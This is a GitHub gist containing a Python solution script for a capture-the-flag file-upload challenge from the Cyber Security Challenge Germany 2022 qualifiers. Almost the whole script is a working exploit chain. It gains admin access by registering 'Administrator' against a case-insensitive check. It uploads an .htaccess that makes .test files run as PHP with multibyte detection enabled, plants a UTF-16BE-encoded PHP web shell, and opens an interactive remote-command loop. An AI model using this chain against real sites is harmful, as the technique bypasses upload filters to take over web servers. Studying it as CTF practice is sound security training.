Last active
June 3, 2022 07:53
-
-
Save seifallahhomrani1/3c57a4c4929377468012d2ef47dc9d32 to your computer and use it in GitHub Desktop.
Cyber Security Challenge Germany 2022 Qualifiers - File-Upload Challenge
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| base_url = "https://6a4f4da9a8be425de24e8228-file-upload.challenge.master.cscg.live:31337" | |
| register_url = f"{base_url}/register.php" | |
| login_url = f"{base_url}/login.php" | |
| upload_url = f"{base_url}/upload.php" | |
| dir_url = f"{base_url}/uploads/" | |
| username = "Administrator" # Don't Change this ! | |
| password = "test123" | |
| #First bug : | |
| #Getting Admin access by signing up as Administrator (case insenstive!) | |
| def register_administrator(username,password): | |
| payload = {'username': username, 'password':password, 'confirm_password':password} | |
| r = requests.post(register_url,data=payload) | |
| return "Register as administrator successful!" if r.status_code==200 else exit("Error") | |
| def login(username,password): | |
| s = requests.Session() | |
| payload = {'username': username, 'password':password} | |
| r = s.post(login_url,data=payload) | |
| return s if r.status_code==200 else exit("Error") | |
| #Generating our web shell | |
| def generate_php_file(filename, script): | |
| phpfile = open(filename, 'wb') | |
| phpfile.write(script.encode('utf-16be')) | |
| phpfile.close() | |
| #Generating the htaccess file | |
| def generate_htacess(): | |
| htaccess = open('.htaccess', 'wb') | |
| htaccess.write(b'AddType application/x-httpd-php .test\n') | |
| htaccess.write(b'php_value zend.multibyte 1\n') | |
| htaccess.write(b'php_value zend.detect_unicode 1\n') | |
| htaccess.write(b'php_value display_errors 1\n') | |
| htaccess.close() | |
| #Getting our juicy RCE ! | |
| def rce(): | |
| stop = False | |
| while not stop : | |
| cmd = str(input('Command = ').strip()) | |
| r = s.get(dir_url+'webshell.test?cmd='+cmd) | |
| print(r.text) | |
| if str(input('Enough ? (y/n)')).strip() == 'y' : | |
| stop = True | |
| generate_htacess() | |
| generate_php_file("webshell.test", "<?php system($_GET['cmd']); die(); ?>") | |
| print(register_administrator(username,password)) | |
| s = login(username,password) | |
| hta = open('.htaccess','rb') | |
| r = s.post(upload_url,files={'fileToUpload':hta}) | |
| webshell = open('webshell.test','rb') | |
| r = s.post(upload_url,files={'fileToUpload':webshell}) | |
| if r.status_code == 200 : | |
| print("Uplaod Success !") | |
| else: | |
| exit("Upload Failure!") | |
| rce() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment